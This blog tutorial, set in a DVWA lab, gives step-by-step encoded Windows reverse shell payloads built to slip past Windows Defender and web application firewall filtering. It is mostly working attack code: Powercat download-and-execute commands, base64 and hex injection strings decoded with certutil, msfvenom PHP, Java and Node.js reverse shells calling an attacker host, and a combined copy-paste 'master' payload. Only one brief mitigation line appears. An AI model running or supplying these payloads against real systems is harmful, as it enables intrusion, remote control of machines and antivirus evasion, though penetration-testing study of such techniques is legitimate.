Windows reverse shell that (almost) always works.
Summary
This blog describes some techniques for generating encoded Windows reverse shell payload. (I also have a similar article for Linux). There are two main reasons why reverse shell payloads don’t work on Windows. First, the payload is typically considered malicious and blocked by Windows Defender. Second, the payload can’t get through the Web Application Firewall (WAF) because it contains suspicious strings. To overcome these issues, you need to combine two techniques:
- Use stealth payload that is streamed over the network
- Use additional payload encoding
In this PoC, we are using a Windows 10 machine with Windows Defender and Windows Firewall enabled. We will simulate WAF with Damn Vulnerable Web Application (DVWA) with the security level set to high. Also, the attack approach is from a 100% black box perspective with no prior knowledge of the application input validation or prior knowledge of the binaries available on the target web server.
Disclaimer
This article is for informational and educational purpose only, and for those who’re willing and curious to know and learn about Security and Penetration Testing. The content may not be used for illegal purposes. If you’re ready to learn something new for the good, then read on.
Why this blog?
There is a lot of online information about different payloads that can be used to set up a reverse shell. The most notable is the online reverse shell generator (https://www.revshells.com/). This site is really fantastic, it allows you to dynamically generate reverse shell code for Linux, Windows, or MacOS in a variety of languages including Bash, Python, Powershell, etc.
However, of all the Windows based reverse shells in www.revshells.com, not one them worked with our implementation Damn Vulnerable Web Application (DVWA on Xampp) command injection lab for which we set the security level to “high”. When the security level is set to “high”, the web server performs extensive input validation, filtering out many characters that are required in the code to spawn a reverse shell. Another key challenge is that we rely on a standard installation of Windows 10. This means that Windows Defender and Windows Firewall are functional and running.
In the first sections, I will show you some encoding techniques to bypass application firewall filtering. In part 2, we will create a list of multiple reverse shells that are not detected by Windows Defender. We will encode them all together into a “master” copy-pastable.
Lab environment
This POC consists of machines: an attacker machine (Kali Linux, 172.16.78.251) and a vulnerable Windows web server (Windows 10, 172.16.78.243):
Kali 64-bit [Version 24.2]
- IP-Address: 172.16.78.251
DVWA Windows 10
- IP-Address: 172.16.78.243
- Xampp DVWA vulnerable web server (https://github.com/digininja/DVWA).
- Windows 10 Professional [Version 10.0.19045.4780]
- Windows Defender and Windows Firewall are turned on
I will not explain how install a DVWA web server on Xampp. The following installation process walkthrough is available: https://www.linkedin.com/pulse/how-setup-dvwa-windows-10-using-xampp-shubham-yadav/.
Part 1: Encoding techniques Powershell/Powercat reverse shell on DVWA Linux (Security level=High)
Note: it’s possible to skip part 1 and directly start with part 2 (steps 8 till 15)
This article is not about the details of exploiting command injection. You can find more information my other Medium article: https://medium.com/system-weakness/the-ultimate-pen-tester-guide-to-command-injection-d29fac2f4c3b. We will only use the DVWA command injection vulnerability for illustration purposes. You are allowed use an other way to execute the code snippets in this blog post.
Attack context:
· Target OS: Windows
· DVWA Security level: High
· Vulnerable web site: http://172.16.78.251/dvwa/vulnerabilities/exec/
Let’s start with confirming we have our command injection vulnerability when the DVWA Security level is set to “Low”
1. Performed against vulnerable web server, Windows DVWA.
Configure your browser to use Burp Suite as an interceptor tool (we used the Burp Suite integrated browsers). If not done yet, set the DVWA security level to ‘low’. Browse to the DVWA Command Injection site (http://192.168.62.165/dvwa/vulnerabilities/exec/).
Perform the ’ping a device’ function and ping the loopback address or localhost.
The TTL value (128) tells us it’s a Windows web server. The payload is not reflected in the URL, so we also know that we are dealing with a POST request.
Next, we will use the pipe character ‘|’ to trigger the command injection vulnerability. Execute the following command:
127.0.0.1|dir /B
As you can see in the screenshot above, the second "dir /B" command is executed. This means we triggered the command injection vulnerability. In addition to the pipe character '|', the slash character '/' is not filtered.
Next, we will use the command injection vulnerability to setup a reverse shell using Powershell with the Powercat payload (https://github.com/besimorhino/powercat) and certutile.
Why PowerShell and certutil.exe?
The answer is simple: both PowerShell and certutil.exe are shipped with most Windows versions. You will find Powershell and certutile.exe in Windows 7 or higher.
In the next sections, we will setup the following Powershell reverse shells:
- Plaintext Powershell/Powercat (DVWA low)
- Base64 encoded Powershell/Powercat (DVWA high)
- Hexadecimal encoded Powershell/Powercat(DVWA high
In the last section, we will combine multiple reverse shells that are not detected by Windows Defender:
- Base64 encoded multiple languages (DVWA high)
- Hexadecimal encoded multiple languages (DVWA high)
Plaintext
In my first blog post ever (https://medium.com/system-weakness/evade-windows-defender-reverse-shell-detection-6fa9f5eee1d1) I showed you how you can use Powercat to set up an undetected reverse shell. The actual Powershell command is executed in ‘plaintext’, but the Powercat payload is Base64 encoded. This method still works today!
The Powercat payload needs to be steamed over the network. This means that on our attacker machine, in addition to a netcat listener, we will need a web listener.
Because of input filtering, this ‘plaintext Powershell/Powercat payload’ only works on the DVWA security level Low. Let go ahead!
2. Performed on Kali Linux.
Set up a netcat listener.
nc -nlvp 443
You need to stop and restart this netcat listener after every new encoding technique in this PoC.
3. Performed on Kali Linux.
Launch a PHP web server. Open a new Bash terminal tab use copy and paste the following code:
php -S 0.0.0.0:80 -t /tmp
Leave this web server open for the remainder of part 1 of this PoC.
4. Performed on Kali Linux.
Create encoded Powercat reverse shell payload. Open a Bash terminal use copy and paste the following code (adjust the ip-address to you Kali Linux address):
attacker=172.16.78.251
portnc=443
rshell=shell-443.txt
pwsh -c "iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c $attacker -p $portnc -e cmd.exe -ge" > /tmp/$rshell
Our result is the following file in the webroot:
/tmp/shell-443.txt
5. Performed against vulnerable web server, Windows DVWA (Security Level=Low).
Download the Powercat code with (plaintext) Powershell. Add the plaintext Powershell payload to the command line injection vulnerability. Use the pipe '|' for the second command to execute, like 127.0.0.1|<paste payload here>. In our case, the final construct is:
127.0.0.1|powershell /c $code=(New-Object System.Net.Webclient).DownloadString('http://172.16.78.251:80/shell-443.txt');iex 'powershell -E $code'
Check out your web server. The Powercat file should be downloaded.
Check out your netcat listener. A reverse shell connection is successful.
Stop and restart the netcat listener.
In the next section, we will use different encoding techniques for the Powershell / Powercat reverse shell. This enables us to set up a reverse shell when the DVWA security level is set to High.
Base64 encoding
You may already be familiar with the base64 encoding technique. It converts every 3 bytes into 4 bytes ASCII format. The advantage is that the payload remains relatively short and special characters are neutralized. The base64 can be decoded with Powershell or the certutil.exe tool. Both these tools are present in Windows 7 or higher. The disadvantage of base64 is the usage of the “+” character. In a URL (GET request), the ‘+’ is seen as a space and must be additionally encoded to %2B.
The base64 encode payload works up to the DVWA security level High.
Note: steps 2 till 4 should be performed. That means, on our Kali machine, we have a netcat listener (port 443), a HTTP listener (port 80) and the file /tmp/shell-443.txt is in the webroot.
6. Performed on Kali Linux.
Create Base64 encoded Powershell reverse shell payload. Open a Bash terminal use copy and paste the following code (adjust the ip-address to you Kali Linux address):
attacker=172.16.78.251
portweb=80
rshell=shell-443.txt
echo START /B powershell -c "\$code=(New-Object System.Net.Webclient).DownloadString('http://${attacker}:${portweb}/${rshell}');iex 'powershell -E \$code'"| base64 -w 0 | tr -d '\n\r'
Our result is the following string:
U1RBUlQgL0IgcG93ZXJzaGVsbCAtYyAkY29kZT0oTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xNzIuMTYuNzguMjUxOjgwL3NoZWxsLTQ0My50eHQnKTtpZXggJ3Bvd2Vyc2hlbGwgLUUgJGNvZGUnCg==
We will use this string in step 7.
7. Performed against vulnerable web server, Windows DVWA (Security Level=High).
Add payload to the command line injection vulnerability. Use the pipe ‘|’ for the second command to execute, like 127.0.0.1|<paste payload here>. In our case, the final construct is:
127.0.0.1|echo [paste Base64 code]>b64.txt|certutil /f /decode b64.txt powercat_shell.bat|START powercat_shell.bat
Our payload to get a reverse shell:
127.0.0.1|echo U1RBUlQgL0IgcG93ZXJzaGVsbCAtYyAkY29kZT0oTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xNzIuMTYuNzguMjUxOjgwL3NoZWxsLTQ0My50eHQnKTtpZXggJ3Bvd2Vyc2hlbGwgLUUgJGNvZGUnCg==>b64.txt|certutil /f /decode b64.txt powercat_shell.bat|START powercat_shell.bat
Check out your web server. The Powercat file should be downloaded.
Check out your netcat listener. A reverse shell connection is set up.
Stop and restart the netcat listener.
Note: If you need to handle GET requests, you must also encode spaces with “+” characters in the URL. In case of GET requests, you can use the following structure.
127.0.0.1|echo+[paste Base64 code]>b64.txt|certutil+/f+/decode+b64.txt+powercat_shell.bat|START+powercat_shell.bat
Hexadecimal encoding
Hexadecimal my favorite encoding/decoding technique for Windows. With certutil.exe it is possible to hexadecimal characters back to plaintext. This technique has several advantages:
- This is a relatively unknown technique and there is a much smaller chance that hexadecimal strings will be detected by Web Application Firewalls.
- You do not have to bother with url-encoding the '+' symbol, because the payload only includes digits and the alphabetical letters 'a' through 'f'.
Note: steps 2 till 4 should be performed. That means we have a netcat listener (port 443), a HTTP listener (port 80) and the file /tmp/shell-443.txt is in the webroot.
8. Performed on Kali Linux.
Create hexadecimal encoded Powershell reverse shell payload. Open a Bash terminal use copy and paste the following code (adjust the ip-address to you Kali Linux address):
attacker=172.16.78.251
portweb=80
rshell=shell-443.txt
echo START /B powershell -c "\$code=(New-Object System.Net.Webclient).DownloadString('http://${attacker}:${portweb}/${rshell}');iex 'powershell -E \$code'"| xxd --ps | tr -d '\n\r'
Our result is the following string:
5354415254202f4220706f7765727368656c6c202d632024636f64653d284e65772d4f626a6563742053797374656d2e4e65742e576562636c69656e74292e446f776e6c6f6164537472696e672827687474703a2f2f3137322e31362e37382e3235313a38302f7368656c6c2d3434332e74787427293b6965782027706f7765727368656c6c202d452024636f6465270a
We will use this string in step 9.
9. Performed against vulnerable web server, Windows DVWA (Security Level=High).
Add payload to the command line injection vulnerability. Use the pipe ‘|’ for the second command to execute, like 127.0.0.1|<paste payload here>. In our case, the final construct is:
127.0.0.1|echo [paste hexadecimal code]>hex.txt|certutil /f /decodehex hex.txt hex_shell.bat|START hex_shell.bat
Our payload to get a reverse shell:
127.0.0.1|echo 5354415254202f4220706f7765727368656c6c202d632024636f64653d284e65772d4f626a6563742053797374656d2e4e65742e576562636c69656e74292e446f776e6c6f6164537472696e672827687474703a2f2f3137322e31362e37382e3235313a38302f7368656c6c2d3434332e74787427293b6965782027706f7765727368656c6c202d452024636f6465270a>hex.txt|certutil /f /decodehex hex.txt hex_shell.bat|START hex_shell.bat
Check out your web server. The Powercat file should be downloaded.
Check out your netcat listener. A reverse shell connection is set up.
Stop the netcat listener.
Note: If you need to handle GET requests, you must also encode spaces with “+” characters in the URL. In case of GET requests, you can use the following structure:
127.0.0.1|echo+[paste hexadecimal code]>hex.txt|certutil+/f+/decode+hex.txt+hex_shell.bat|START+hex_shell.bat
Part 2: Concatenate multiple reverse shells
All Windows versions since Windows 7 are shipped with Powershell and certutil.exe. However, you may encounter a system with no access to Powershell or certutil.exe. For example this could be a nice ‘rabbit hole’ in a CtF competition or in an exam. In the next section, I will show you how to use the hexadecimal encoding technique with multiple Windows reverse shells. We are talking about Powershell/Powercat, Java, PHP/metasploit and NodeJS. All four are not detected by Windows Defender. If you want to, you can add extra payload like ‘hoax’ shell (https://github.com/t3l3machus/hoaxshell).
We will start the whole procedure from scratch.
10. Performed on Kali Linux.
Open a Bash terminal. Rename this terminal to “web server”. Execute the command below to start simple python web server:
python -m http.server -b 0.0.0.0 80 -d /tmp
Note: we cannot use a PHP web server, because our PHP payload is not compatible with a temporary PHP server (step 3).
Tip: Try using the NodeJS temporary web server. This one has multiple advantages of PHP or Python (https://www.npmjs.com/package/http-server).
11. Performed on Kali Linux.
Open another Bash terminal. Rename this terminal to “netcat”. Execute the command below to start a netcat listener.
nc -nlvp 443
12. Performed on Kali Linux.
Add encoded Powercat reverse shell code to the web root (same as step 2). Open a Bash terminal tab, use copy and paste to generate Powercat reverse shell code:
attacker=172.16.78.251
portnc=443
rshell=shell-443.txt
pwsh -c "iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c $attacker -p $portnc -e cmd.exe -ge" > /tmp/$rshell
13. Performed on Kali Linux.
Add PHP reverse shell code to the web root. In a Bash terminal, use copy and paste to generate Metasploit PHP reverse shell code:
attacker=172.16.78.251
portnc=443
msfvenom -p php/reverse_php LHOST=$attacker LPORT=$portnc -f raw > /tmp/reverse_php.php14. Performed on Kali Linux.
Add Java reverse shell code to the web root. In a Bash terminal, use copy and paste to generate Java reverse shell code:
attacker=172.16.78.251
portnc=443
cat << EOF > /tmp/shell.java
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class shell {
public static void main(String[] args) {
String host = "${attacker}";
int port = ${portnc};
String cmd = "cmd";
try {
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
while (pi.available() > 0)
so.write(pi.read());
while (pe.available() > 0)
so.write(pe.read());
while (si.available() > 0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
} catch (Exception e) {}
}
p.destroy();
s.close();
} catch (Exception e) {}
}
}
EOF
15. Performed on Kali Linux.
Create a shells_windows.txt file. This files includes ‘stealth’ reverse shell code Powershell (Powercat), PHP and NodeJS. Open a Bash terminal use copy and paste the following code:
attacker=172.16.78.251
portnc=443
portweb=80
cat << EOF > /tmp/shells_windows.txt
php -d allow_url_fopen=true -r "eval(file_get_contents('http://${attacker}:${portweb}/reverse_php.php'));"
powershell -c \$code=(New-Object System.Net.Webclient).DownloadString('http://${attacker}:${portweb}/shell-443.txt');iex 'powershell -E \$code'
START /B powershell.exe -c (New-Object System.Net.Webclient).DownloadFile('http://${attacker}:${portweb}/shell.java','C:\Windows\Tasks\shell.java'); javac C:\Windows\Tasks\shell.java; java -cp C:\Windows\Tasks\ shell
echo (function(){var net = require('net'),cp = require('child_process'),sh = cp.spawn('cmd', []);var client = new net.Socket();client.connect(${portnc}, '${attacker}', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/; // Prevents > c:/Windows/Tasks/node_shell.js
echo })(); >>c:/Windows/Tasks/node_shell.js
node c:/Windows/Tasks/node_shell.js
EOF
16. Performed on Kali Linux.
Create different encoded representations of the text file from step 13. Open a Bash terminal use copy and paste the following code:
Base64
cat /tmp/shells_windows.txt | base64 -w 0 | tr -d '\n\r'Hexadecimal
cat /tmp/shells_windows.txt | xxd --ps | tr -d '\n\r'
Result:
We can use the following hexadecimal code in our payload:
706870202d6420616c6c6f775f75726c5f666f70656e3d74727565202d7220226576616c2866696c655f6765745f636f6e74656e74732827687474703a2f2f3137322e31362e37382e3235313a38302f726576657273655f7068702e7068702729293b220a0a706f7765727368656c6c202d632024636f64653d284e65772d4f626a6563742053797374656d2e4e65742e576562636c69656e74292e446f776e6c6f6164537472696e672827687474703a2f2f3137322e31362e37382e3235313a38302f7368656c6c2d3434332e74787427293b6965782027706f7765727368656c6c202d452024636f646527200a0a5354415254202f4220706f7765727368656c6c2e657865202d6320284e65772d4f626a6563742053797374656d2e4e65742e576562636c69656e74292e446f776e6c6f616446696c652827687474703a2f2f3137322e31362e37382e3235313a38302f7368656c6c2e6a617661272c27433a5c57696e646f77735c5461736b735c7368656c6c2e6a61766127293b20206a6176616320433a5c57696e646f77735c5461736b735c7368656c6c2e6a6176613b206a617661202d637020433a5c57696e646f77735c5461736b735c207368656c6c0a0a6563686f202866756e6374696f6e28297b766172206e6574203d207265717569726528276e657427292c6370203d207265717569726528276368696c645f70726f6365737327292c7368203d2063702e737061776e2827636d64272c205b5d293b76617220636c69656e74203d206e6577206e65742e536f636b657428293b636c69656e742e636f6e6e656374283434332c20273137322e31362e37382e323531272c2066756e6374696f6e28297b636c69656e742e706970652873682e737464696e293b73682e7374646f75742e7069706528636c69656e74293b73682e7374646572722e7069706528636c69656e74293b7d293b72657475726e202f612f3b202f2f2050726576656e7473203e20633a2f57696e646f77732f5461736b732f6e6f64655f7368656c6c2e6a730a6563686f207d2928293b203e3e633a2f57696e646f77732f5461736b732f6e6f64655f7368656c6c2e6a730a6e6f646520633a2f57696e646f77732f5461736b732f6e6f64655f7368656c6c2e6a730a
We will use this string in step 17.
17. Performed against vulnerable web server, Windows DVWA (Security Level=High).
Add payload to the command line injection vulnerability. Use the pipe ‘|’ for the second command to execute, like 127.0.0.1|<paste payload here>. In our case, the final construct is:
127.0.0.1|echo [paste hexadecimal code]>h.txt|certutil /f /decodehex h.txt multiple_shells.bat|START multiple_shells.bat
Our statement to get a reverse shell:
127.0.0.1|echo 706870202d6420616c6c6f775f75726c5f666f70656e3d74727565202d7220226576616c2866696c655f6765745f636f6e74656e74732827687474703a2f2f3137322e31362e37382e3235313a38302f726576657273655f7068702e7068702729293b220a0a706f7765727368656c6c202d632024636f64653d284e65772d4f626a6563742053797374656d2e4e65742e576562636c69656e74292e446f776e6c6f6164537472696e672827687474703a2f2f3137322e31362e37382e3235313a38302f7368656c6c2d3434332e74787427293b6965782027706f7765727368656c6c202d452024636f646527200a0a5354415254202f4220706f7765727368656c6c2e657865202d6320284e65772d4f626a6563742053797374656d2e4e65742e576562636c69656e74292e446f776e6c6f616446696c652827687474703a2f2f3137322e31362e37382e3235313a38302f7368656c6c2e6a617661272c27433a5c57696e646f77735c5461736b735c7368656c6c2e6a61766127293b20206a6176616320433a5c57696e646f77735c5461736b735c7368656c6c2e6a6176613b206a617661202d637020433a5c57696e646f77735c5461736b735c207368656c6c0a0a6563686f202866756e6374696f6e28297b766172206e6574203d207265717569726528276e657427292c6370203d207265717569726528276368696c645f70726f6365737327292c7368203d2063702e737061776e2827636d64272c205b5d293b76617220636c69656e74203d206e6577206e65742e536f636b657428293b636c69656e742e636f6e6e656374283434332c20273137322e31362e37382e323531272c2066756e6374696f6e28297b636c69656e742e706970652873682e737464696e293b73682e7374646f75742e7069706528636c69656e74293b73682e7374646572722e7069706528636c69656e74293b7d293b72657475726e202f612f3b202f2f2050726576656e7473203e20633a2f57696e646f77732f5461736b732f6e6f64655f7368656c6c2e6a730a6563686f207d2928293b203e3e633a2f57696e646f77732f5461736b732f6e6f64655f7368656c6c2e6a730a6e6f646520633a2f57696e646f77732f5461736b732f6e6f64655f7368656c6c2e6a730a>h.txt|certutil /f /decodehex h.txt multiple_shells.bat|START multiple_shells.bat
Check out your web server. The PHP payload file should be downloaded first (on top of our list).
Check out your netcat listener. A (php) reverse shell connection is set up.
17. Optional: Performed on Kali Linux.
We have a reverse shell based on php. This is because php is our first shell in /tmp/shells_windows.txt. You can trigger the next reverse shell by starting another netcat listener (nc -nvlp 443) in a new terminal tab, than exit the current php reverse shell.
You can see the next connection (Powershell / Powercat) in terminal tab ‘netcat 2’.
Note: If you need to handle GET requests, you must also encode spaces with “+” characters in the URL. In case of GET requests, you can use the following structure.
127.0.0.1|echo+[paste hexadecimal code]>h.txt|certutil+/f+/decodehex+h.txt+multiple_shells.bat|START+multiple_shells.bat
Mitigations
Block all outgoing connections except for specific ports and remote IP addresses for required services. To achieve this, use sandboxing or run your servers in minimal containers. Configure proxy servers with restricted and tightly controlled destinations.
References
https://github.com/digininja/DVWA
